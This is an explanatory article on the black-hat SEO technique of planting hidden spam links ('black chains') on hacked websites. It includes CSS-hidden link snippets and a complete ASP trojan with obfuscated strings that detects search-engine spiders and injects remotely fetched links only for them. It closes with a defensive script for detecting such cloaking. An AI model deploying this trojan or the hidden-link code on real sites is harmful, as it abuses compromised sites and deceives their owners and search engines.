The black chain (hidden link) is a very common black-hat SEO technique. Generally speaking, it means obtaining backlinks from other sites by illegitimate means. The most common form is to exploit vulnerabilities in various website programs to get a Webshell on sites with high search-engine weight or PR, and then plant links to one's own site on the hacked sites.
Hackers plant black chains in many different ways, but there are essentially only two techniques: one is to place the link code directly on the target page; the other serves the link only to search-engine visitors, so that the search engine is fooled into believing the link exists on the target site while ordinary visitors never see it. The two methods are explained in detail below.
1. Add the link code directly to the target page: this is the most common technique and also the easiest to discover; most early black chains worked this way. The hacker first breaks into the target site's FTP, then, depending on the program the site runs, adds an "invisible" link to the template or other pages, as sketched below. Concealment is relatively poor: if the target site's administrator has some SEO knowledge, the link is easy to find, which is why more and more hackers have moved on to the second method.
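For illustration only, a minimal sketch of the kind of "invisible" link code that gets injected into a template; the domain names and keywords are placeholders, and the exact styling varies from case to case:

<!-- hidden with CSS so human visitors never see it -->
<div style="display:none">
<a href="http://spammer-site.example/">target keyword</a>
</div>
<!-- or pushed far off-screen instead of hidden outright -->
<div style="position:absolute; left:-9999px">
<a href="http://spammer-site.example/">another keyword</a>
</div>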
2. Serve different content based on a check in the code: the script examines the visitor's name (User-Agent) and IP address, and if the visitor is a search-engine spider, it appends another piece of code containing the links to the target page. An ASP example is described below.
After breaking into the target site's FTP, the hacker leaves two trojan files in the site's program. One, named int.asp, contains the following code:
<%
On Error Resume Next
httpuser = LCase(Request.ServerVariables("HTTP_USER_AGENT"))
' Only act when the visitor's User-Agent looks like a search-engine spider
If InStr(httpuser, "baidu") > 0 Or InStr(httpuser, "google") > 0 Or InStr(httpuser, "sogou") > 0 Or InStr(httpuser, "soso") > 0 Then
    ' ProgID assembled from fragments, apparently to dodge simple keyword scans
    Set objxmlhttp = Server.CreateObject("MSX" & "ML2.S" & "erv" & "erXML" & "HTTP")
    objxmlhttp.Open "GET", "http://domain/a/193.txt", False
    objxmlhttp.Send
    gethtml = objxmlhttp.responseBody
    Set objxmlhttp = Nothing
    ' Decode the downloaded bytes as gb2312 text via ADODB.Stream
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 1 : objStream.Mode = 3 : objStream.Open
    objStream.Write gethtml
    objStream.Position = 0 : objStream.Type = 2 : objStream.Charset = "gb2312"
    gethtml = objStream.ReadText : objStream.Close
    ' Strip the "-istxt-" marker and emit the link code only to the spider
    key1 = Replace(LCase(gethtml) & "", "-istxt-", "")
    Response.Write key1
End If
%>
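What 193.txt actually contains varies from case to case; judging from the Replace call above, a plausible (purely hypothetical) layout is hidden link code wrapped in "-istxt-" markers, which the script strips before writing the links into the page:

-istxt-<div style="display:none"><a href="http://spammer-site.example/">keyword one</a> <a href="http://another-spam.example/">keyword two</a></div>-istxt-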
int.asp decides whether a visitor is a spider from its IP and User-Agent name, and if so writes the contents of the second file, 193.txt (which is mostly link code), into the target page. The code the spider crawls is therefore not the same as the code we see: neither viewing the page source nor using webmaster tools will reveal the black chain. The only way to spot the problem is to check the page's cached snapshot in the search engine (or to simulate a spider request yourself, as sketched below).
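The example trojan above keys only on the User-Agent string, so one complementary check is to fetch the page while pretending to be a spider and compare it with a normal fetch. A rough VBScript sketch, run with cscript.exe on Windows; the URL is a placeholder, and variants that also verify the spider's IP address will not be fooled:

' check_blackchain.vbs - compare what a browser sees with what a "spider" sees
Dim http, normalBody, spiderBody
Set http = CreateObject("MSXML2.ServerXMLHTTP")

' First request: ordinary browser User-Agent
http.Open "GET", "http://www.yoursite.example/", False
http.setRequestHeader "User-Agent", "Mozilla/5.0"
http.Send
normalBody = http.responseText

' Second request: pretend to be Baiduspider
http.Open "GET", "http://www.yoursite.example/", False
http.setRequestHeader "User-Agent", "Baiduspider"
http.Send
spiderBody = http.responseText

' Note: dynamic content (timestamps, session tokens) can cause benign differences
If normalBody <> spiderBody Then
    WScript.Echo "The page served to the spider differs - possible hidden link injection."
Else
    WScript.Echo "No difference detected (an IP-checking variant could still be present)."
End If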
The second approach is more complicated, but it is very hard to detect: even if your site gets penalized or deindexed by the search engines because of it, you may still be unable to find the cause. It truly is a killer-level black chain technique.